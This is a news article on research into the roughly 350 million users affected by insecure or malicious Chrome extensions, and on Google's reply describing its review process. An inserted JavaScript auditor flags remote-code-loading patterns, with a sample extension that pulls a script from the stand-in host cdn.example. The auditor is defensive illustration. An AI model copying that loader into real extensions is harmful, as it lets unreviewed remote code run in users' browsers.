Google underplaying risk of compromised extensions to Chrome

Compromised extensions affect almost 350 million users globally

Half the extensions known to feature vulnerabilities in Google Chrome are still available in the Web Store two years after disclosure, claim researchers

Compromised extensions for the Chrome web browser affect almost 350 million users worldwide, despite Google's claims that insecure or malicious code affects under one per cent of all extensions in the Chrome Web Store.

The claims were made in a recently published research paper by researchers Sheryl Hsu, Manda Tran and Aurore Fass, security specialists at Cornell University.

"Security-noteworthy extensions are a significant issue: they have pervaded the Chrome Web Store for years and affect almost 350 million users," they wrote. Moreover, there are clusters of extensions sharing a similar code base, often cut and pasted from public repositories and forums, including code from vulnerable JavaScript libraries. These issues indicate that Google's Chrome security reviews might be flawed.

Security-noteworthy extensions encompass both out-and-out malicious extensions and extensions running dated code that could include vulnerabilities. Indeed, 60 per cent of the extensions in the Chrome Web Store have never been updated, and half the extensions known to feature vulnerabilities are still there two years after disclosure.

Browser extensions are a particular security concern for both individuals and corporates, as they can access sensitive information, propagate malware, keep tabs on users, and even steal data.

In response to security concerns, Google developed the Manifest v3 initiative, an API specification intended to limit the potential for extensions to perpetrate such abuses. For example, one of the security enhancements of Manifest v3 was blocking extensions from downloading and running external code – all code must be packaged within the extension.

But critics claim that it was as much about preventing users from blocking adverts as it was about security, while the researchers note that extensions based on Manifest v2 still account for the majority of Chrome extensions.

Nevertheless, in a Google Security blog, published in response, Chrome Security Team members Benjamin Ackerman, Anunoy Ghosh, and David Warren were keen to defend the company and its technology.

"Before an extension is even accessible to install from the Chrome Web Store, we have two levels of verification to ensure an extension is safe," they wrote.

These include, first, an automated review to identify potentially suspicious code in an extension. This is followed by a review by a team member, which also includes an examination of the images, descriptions, and public policies of each extension.
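The Manifest v3 rule mentioned earlier (all code must ship inside the package) and the automated suspicious-code review described here can both be illustrated with a small static audit. The following is an added example written for this article, not Google's review tooling and not code from the research paper: it takes a constructed extension package (a manifest object plus a map of file paths to JavaScript source) and flags the remote-code-loading patterns that Manifest v3 forbids. The sample packages, the origin cdn.example and the pattern list are all constructed for the illustration.

```javascript
// Added example (not Google's tooling): a minimal static audit that flags
// remote-code-loading patterns in a Chrome extension package, of the kind an
// automated store review would look for. All inputs below are constructed.

const REMOTE_CODE_PATTERNS = [
  { id: "eval", re: /\beval\s*\(/, why: "eval() can execute downloaded strings as code" },
  { id: "new-function", re: /\bnew\s+Function\s*\(/, why: "Function constructor compiles strings at runtime" },
  { id: "remote-script-src", re: /\.src\s*=\s*["']https?:\/\//, why: "script element pointed at a remote origin" },
  { id: "remote-script-tag", re: /<script[^>]*\ssrc\s*=\s*["']https?:\/\//i, why: "inline HTML loads a remote script" },
  { id: "remote-importscripts", re: /\bimportScripts\s*\(\s*["']https?:\/\//, why: "worker imports a remote script" },
];

// Manifest-level checks: MV2 still permits remotely hosted code, and an MV2
// content_security_policy could whitelist remote script origins (MV3 rejects such values).
function auditManifest(manifest) {
  const findings = [];
  const version = manifest.manifest_version;
  if (version !== 3) {
    findings.push({ file: "manifest.json", id: "manifest-v2",
      why: `manifest_version ${version}: platform still permits remotely hosted code` });
  }
  const csp = manifest.content_security_policy;
  const cspText = typeof csp === "string" ? csp : (csp && csp.extension_pages) || "";
  const scriptSrc = cspText.split(";").map(s => s.trim()).find(s => s.startsWith("script-src"));
  if (scriptSrc && /https?:\/\//.test(scriptSrc)) {
    findings.push({ file: "manifest.json", id: "csp-remote-origin",
      why: `CSP allows a remote script origin: ${scriptSrc}` });
  }
  return findings;
}

// Source-level checks: scan each line for the patterns above and record where they occur.
function auditSource(path, source) {
  const findings = [];
  source.split("\n").forEach((line, i) => {
    for (const p of REMOTE_CODE_PATTERNS) {
      if (p.re.test(line)) findings.push({ file: path, line: i + 1, id: p.id, why: p.why });
    }
  });
  return findings;
}

function auditExtension(pkg) {
  const findings = auditManifest(pkg.manifest);
  for (const [path, source] of Object.entries(pkg.files)) {
    findings.push(...auditSource(path, source));
  }
  return findings;
}

// Constructed sample 1: an MV2 extension whose real logic is fetched from a server at runtime.
const mv2RemoteLoader = {
  manifest: {
    manifest_version: 2,
    name: "Example loader (constructed)",
    content_security_policy: "script-src 'self' https://cdn.example; object-src 'self'",
    background: { scripts: ["background.js"] },
  },
  files: {
    "background.js": [
      "const s = document.createElement('script');",
      "s.src = 'https://cdn.example/payload.js';",
      "document.head.appendChild(s);",
    ].join("\n"),
  },
};

// Constructed sample 2: an MV3 extension with all of its code bundled in the package.
const mv3Bundled = {
  manifest: {
    manifest_version: 3,
    name: "Example bundled (constructed)",
    background: { service_worker: "sw.js" },
  },
  files: {
    "sw.js": "chrome.runtime.onInstalled.addListener(() => console.log('installed'));",
  },
};

// Summary helper: number of findings and their ids, in audit order.
function summarize(pkg) {
  const findings = auditExtension(pkg);
  return { count: findings.length, ids: findings.map(f => f.id) };
}

console.log(summarize(mv2RemoteLoader)); // 3 findings: manifest-v2, csp-remote-origin, remote-script-src
console.log(summarize(mv3Bundled));      // 0 findings
```

A real review pipeline would run on the unpacked CRX and combine this kind of pattern scan with permission analysis and behavioural monitoring; the point of the example is that the MV3 "no remote code" rule is mechanically checkable, while an MV2 package can legitimately declare a remote script origin and load code the reviewer never sees.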

"Depending on the results of both the automated and manual review, we may perform an even deeper and more thorough review of the code.

"This review process weeds out the overwhelming majority of bad extensions before they even get published. In 2024, less than one per cent of all installs from the Chrome Web Store were found to include malware. We're proud of this record and yet some bad extensions still get through, which is why we also monitor published extensions."

They added that updates are also monitored – but, it appears, in a much less thorough manner – by "periodically reviewing what extensions are actually doing and comparing that to the stated objectives defined by each extension in the Chrome Web Store".